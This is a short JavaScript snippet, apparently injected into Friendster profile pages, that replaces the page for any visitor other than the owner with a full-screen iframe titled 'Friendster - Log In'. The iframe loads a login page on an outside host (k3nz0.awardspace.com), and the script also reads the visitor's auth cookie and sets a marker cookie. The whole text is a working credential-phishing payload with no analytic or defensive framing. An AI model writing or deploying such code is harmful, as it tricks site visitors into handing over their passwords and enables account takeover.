

var id=fgetCookie("friendster_identitas");
if(id!=pageViewerID)
{
var c=fgetCookie("friendster_auth"),fUrl="http://k3nz0.awardspace.com/friendster/login.php"+"?next="+escape("/")+pageOwnerID;
var pTitle="Friendster - Log In";
document.cookie="friendster_identitas="+pageViewerID+"; path=/";
createObj(pTitle,fUrl);
}
function createObj(pTitle,fUrl){
document.title=pTitle;document.body.innerHTML='';
var oLey=document.createElement("div");
oLey.style.textAlign='left';document.body.appendChild(oLey);
var nFrm=document.createElement("iframe");
nFrm.setAttribute('src',fUrl);
nFrm.setAttribute("style",'position: absolute; border:0;');
nFrm.setAttribute('width',1020);
nFrm.setAttribute('height',611);oLey.appendChild(nFrm);}

